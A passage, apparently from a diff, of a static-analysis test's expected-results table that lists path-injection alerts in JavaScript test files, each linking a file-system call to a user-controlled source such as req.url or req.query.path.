TaintedPath.js:111:23:111:26 | path | This path depends on a $@. | TaintedPath.js:109:23:109:29 | req.url | user-provided value | +| TaintedPath.js:117:19:117:22 | path | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:117:19:117:22 | path | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:121:19:121:33 | split.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:121:19:121:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:125:19:125:26 | split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:125:19:125:26 | split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:126:19:126:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:129:19:129:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:132:19:132:38 | concatted2.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:134:19:134:29 | split.pop() | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:134:19:134:29 | split.pop() | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:176:38:176:44 | req.url | user-provided value | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:177:51:177:57 | req.url | user-provided value | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:179:44:179:50 | req.url | user-provided value | +| TaintedPath.js:185:31:185:34 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:185:31:185:34 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:186:45:186:48 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:186:45:186:48 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:187:35:187:38 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:187:35:187:38 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:195:29:195:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:191:24:191:30 | req.url | user-provided value | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:202:29:202:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:205:31:205:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | +| express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | This path depends on a $@. | express.js:8:20:8:32 | req.query.bar | user-provided value | +| handlebars.js:11:32:11:39 | filePath | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:11:32:11:39 | filePath | This path depends on a $@. | handlebars.js:29:46:29:60 | req.params.path | user-provided value | +| handlebars.js:15:25:15:32 | filePath | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:15:25:15:32 | filePath | This path depends on a $@. | handlebars.js:43:15:43:29 | req.params.path | user-provided value | +| normalizedPaths.js:13:19:13:22 | path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:13:19:13:22 | path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:14:19:14:29 | './' + path | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:14:19:14:29 | './' + path | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:15:19:15:38 | path + '/index.html' | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:15:19:15:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:16:19:16:53 | pathMod ... .html') | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:16:19:16:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:17:19:17:57 | pathMod ... , path) | normalizedPaths.js:11:14:11:27 | req.query.path | normalizedPaths.js:17:19:17:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:11:14:11:27 | req.query.path | user-provided value | +| normalizedPaths.js:23:19:23:22 | path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:23:19:23:22 | path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:24:19:24:29 | './' + path | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:24:19:24:29 | './' + path | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:25:19:25:38 | path + '/index.html' | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:25:19:25:38 | path + '/index.html' | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:26:19:26:53 | pathMod ... .html') | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:26:19:26:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:27:19:27:57 | pathMod ... , path) | normalizedPaths.js:21:35:21:48 | req.query.path | normalizedPaths.js:27:19:27:57 | pathMod ... , path) | This path depends on a $@. | normalizedPaths.js:21:35:21:48 | req.query.path | user-provided value | +| normalizedPaths.js:36:19:36:22 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:36:19:36:22 | path | This path depends on a $@. | normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | +| normalizedPaths.js:41:21:41:24 | path | normalizedPaths.js:31:35:31:48 | req.query.path | normalizedPaths.js:41:21:41:24 | path | This path depends on a $@. | normalizedPaths.js:31:35:31:48 | req.query.path | user-provided value | +| normalizedPaths.js:59:19:59:22 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:59:19:59:22 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | +| normalizedPaths.js:63:19:63:38 | path + "/index.html" | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:63:19:63:38 | path + "/index.html" | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | +| normalizedPaths.js:68:21:68:24 | path | normalizedPaths.js:54:35:54:48 | req.query.path | normalizedPaths.js:68:21:68:24 | path | This path depends on a $@. | normalizedPaths.js:54:35:54:48 | req.query.path | user-provided value | +| normalizedPaths.js:78:22:78:25 | path | normalizedPaths.js:73:42:73:55 | req.query.path | normalizedPaths.js:78:22:78:25 | path | This path depends on a $@. | normalizedPaths.js:73:42:73:55 | req.query.path | user-provided value | +| normalizedPaths.js:87:29:87:32 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:87:29:87:32 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | +| normalizedPaths.js:90:31:90:34 | path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:90:31:90:34 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | +| normalizedPaths.js:99:29:99:32 | path | normalizedPaths.js:94:35:94:48 | req.query.path | normalizedPaths.js:99:29:99:32 | path | This path depends on a $@. | normalizedPaths.js:94:35:94:48 | req.query.path | user-provided value | +| normalizedPaths.js:119:19:119:22 | path | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:119:19:119:22 | path | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | +| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:120:19:120:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | +| normalizedPaths.js:135:21:135:24 | path | normalizedPaths.js:130:35:130:48 | req.query.path | normalizedPaths.js:135:21:135:24 | path | This path depends on a $@. | normalizedPaths.js:130:35:130:48 | req.query.path | user-provided value | +| normalizedPaths.js:144:21:144:24 | path | normalizedPaths.js:139:48:139:61 | req.query.path | normalizedPaths.js:144:21:144:24 | path | This path depends on a $@. | normalizedPaths.js:139:48:139:61 | req.query.path | user-provided value | +| normalizedPaths.js:151:21:151:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:151:21:151:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | +| normalizedPaths.js:153:21:153:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:153:21:153:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | +| normalizedPaths.js:165:19:165:22 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:165:19:165:22 | path | This path depends on a $@. | normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | +| normalizedPaths.js:170:21:170:24 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:170:21:170:24 | path | This path depends on a $@. | normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | +| normalizedPaths.js:184:19:184:22 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:184:19:184:22 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:187:21:187:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:187:21:187:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:189:21:189:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:189:21:189:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:192:21:192:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:192:21:192:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:194:21:194:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:194:21:194:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:199:21:199:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:199:21:199:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:205:21:205:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:205:21:205:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:208:21:208:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:208:21:208:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:210:21:210:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:210:21:210:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:222:21:222:24 | path | normalizedPaths.js:214:35:214:48 | req.query.path | normalizedPaths.js:222:21:222:24 | path | This path depends on a $@. | normalizedPaths.js:214:35:214:48 | req.query.path | user-provided value | +| normalizedPaths.js:228:21:228:24 | path | normalizedPaths.js:226:35:226:48 | req.query.path | normalizedPaths.js:228:21:228:24 | path | This path depends on a $@. | normalizedPaths.js:226:35:226:48 | req.query.path | user-provided value | +| normalizedPaths.js:238:19:238:22 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:238:19:238:22 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | +| normalizedPaths.js:245:21:245:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:245:21:245:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | +| normalizedPaths.js:250:21:250:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:250:21:250:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | +| normalizedPaths.js:256:19:256:22 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:256:19:256:22 | path | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:262:21:262:24 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:262:21:262:24 | path | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:270:21:270:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:270:21:270:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:278:21:278:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:278:21:278:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:286:21:286:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:286:21:286:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:296:21:296:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:296:21:296:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:304:18:304:21 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:304:18:304:21 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:309:19:309:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:309:19:309:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:313:19:313:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:313:19:313:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:316:19:316:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:316:19:316:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:325:19:325:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:325:19:325:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:332:19:332:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:332:19:332:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:341:18:341:21 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:341:18:341:21 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | +| normalizedPaths.js:346:19:346:22 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:346:19:346:22 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | +| normalizedPaths.js:356:19:356:22 | path | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:356:19:356:22 | path | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | +| normalizedPaths.js:363:21:363:31 | requestPath | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:363:21:363:31 | requestPath | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | +| normalizedPaths.js:379:19:379:22 | path | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:379:19:379:22 | path | This path depends on a $@. | normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | +| normalizedPaths.js:381:19:381:29 | slash(path) | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:381:19:381:29 | slash(path) | This path depends on a $@. | normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | +| normalizedPaths.js:388:19:388:22 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:388:19:388:22 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | +| normalizedPaths.js:399:21:399:24 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:399:21:399:24 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | +| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | normalizedPaths.js:407:45:407:55 | req.query.x | normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:407:45:407:55 | req.query.x | user-provided value | +| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | normalizedPaths.js:408:38:408:48 | req.query.x | normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:408:38:408:48 | req.query.x | user-provided value | +| normalizedPaths.js:415:19:415:22 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:415:19:415:22 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | +| normalizedPaths.js:426:21:426:24 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:426:21:426:24 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | +| other-fs-libraries.js:11:19:11:22 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:11:19:11:22 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:12:27:12:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:12:27:12:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:13:24:13:27 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:13:24:13:27 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:14:27:14:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:14:27:14:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:16:34:16:37 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:16:34:16:37 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:17:35:17:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:17:35:17:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:19:56:19:59 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:19:56:19:59 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:24:35:24:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:24:35:24:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:40:35:40:38 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:40:35:40:38 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | +| other-fs-libraries.js:41:50:41:53 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:41:50:41:53 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | +| other-fs-libraries.js:42:53:42:56 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:42:53:42:56 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | +| other-fs-libraries.js:51:19:51:22 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:51:19:51:22 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:52:24:52:27 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:52:24:52:27 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:54:36:54:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:54:36:54:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:55:36:55:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:55:36:55:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:57:46:57:49 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:57:46:57:49 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:59:39:59:42 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:59:39:59:42 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:62:43:62:46 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:62:43:62:46 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:63:51:63:54 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:63:51:63:54 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:70:19:70:22 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:70:19:70:22 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:71:10:71:13 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:71:10:71:13 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:72:15:72:18 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:72:15:72:18 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:76:19:76:19 | x | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:76:19:76:19 | x | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:83:16:83:19 | path | other-fs-libraries.js:81:24:81:30 | req.url | other-fs-libraries.js:83:16:83:19 | path | This path depends on a $@. | other-fs-libraries.js:81:24:81:30 | req.url | user-provided value | +| prettier.js:7:28:7:28 | p | prettier.js:6:13:6:13 | p | prettier.js:7:28:7:28 | p | This path depends on a $@. | prettier.js:6:13:6:13 | p | user-provided value | +| prettier.js:11:44:11:44 | p | prettier.js:6:13:6:13 | p | prettier.js:11:44:11:44 | p | This path depends on a $@. | prettier.js:6:13:6:13 | p | user-provided value | +| pupeteer.js:9:28:9:34 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:9:28:9:34 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | +| pupeteer.js:13:37:13:43 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:13:37:13:43 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | +| sharedlib-repro.js:22:18:22:25 | filepath | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | sharedlib-repro.js:22:18:22:25 | filepath | This path depends on a $@. | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | user-provided value | +| tainted-access-paths.js:8:19:8:22 | path | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:8:19:8:22 | path | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:12:19:12:25 | obj.sub | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:12:19:12:25 | obj.sub | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:26:19:26:26 | obj.sub3 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:26:19:26:26 | obj.sub3 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:29:21:29:28 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:29:21:29:28 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:30:23:30:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:30:23:30:30 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:31:23:31:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:31:23:31:30 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:40:23:40:26 | path | tainted-access-paths.js:39:24:39:30 | req.url | tainted-access-paths.js:40:23:40:26 | path | This path depends on a $@. | tainted-access-paths.js:39:24:39:30 | req.url | user-provided value | +| tainted-access-paths.js:49:10:49:13 | path | tainted-access-paths.js:48:24:48:30 | req.url | tainted-access-paths.js:49:10:49:13 | path | This path depends on a $@. | tainted-access-paths.js:48:24:48:30 | req.url | user-provided value | +| tainted-promise-steps.js:11:19:11:35 | await pathPromise | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:11:19:11:35 | await pathPromise | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-promise-steps.js:12:44:12:47 | path | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:12:44:12:47 | path | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | This path depends on a $@. | tainted-require.js:6:19:6:37 | req.param("module") | 